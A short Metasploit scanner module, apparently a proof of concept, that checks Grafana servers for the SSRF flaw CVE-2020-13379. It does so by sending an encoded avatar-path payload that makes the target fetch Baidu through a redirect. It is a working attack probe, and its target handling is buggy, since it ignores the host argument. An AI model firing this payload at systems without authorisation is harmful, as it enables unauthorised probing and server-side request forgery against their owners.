# Grafana SSRF服务器端请求伪造 CVE_2020_13379

require "open-uri"  

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::HttpClient
   
    def initialize
      super(
        'Name'           => 'CVE_2020_13379_PoC',
        'Description'    => 'This module is used to scan the target site for CVE_2020_13379',
        'Author'         => 'H.Mount',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.Need not to set', '192.168.1.1']),
          OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        ]) 
    
    end 
    def run_host(ip)
  
     uri = datastore['TARGETURI']+'//avatar/test%3fd%3dbaidu.com%25253f%253b%252fbp.blogspot.com'  
     begin  
       html_response = nil  
       open(uri) do |http|  
       html_response = http.read  
       end
     rescue => ex
       if ex.message['404']
         print_good('The CVE_2020_13379 vulnerability was not detected at the target site.')
       else
         print_error('Some errors occurred...')
         print_error(ex.message)
       end
       return
     end   
     #  puts html_response
     if html_response['百度一下']
       print_warning('The CVE_2020_13379 vulnerability exists at the target site!')
     else
       print_good('The CVE_2020_13379 vulnerability was not detected at the target site.')
     end
        

    end
end

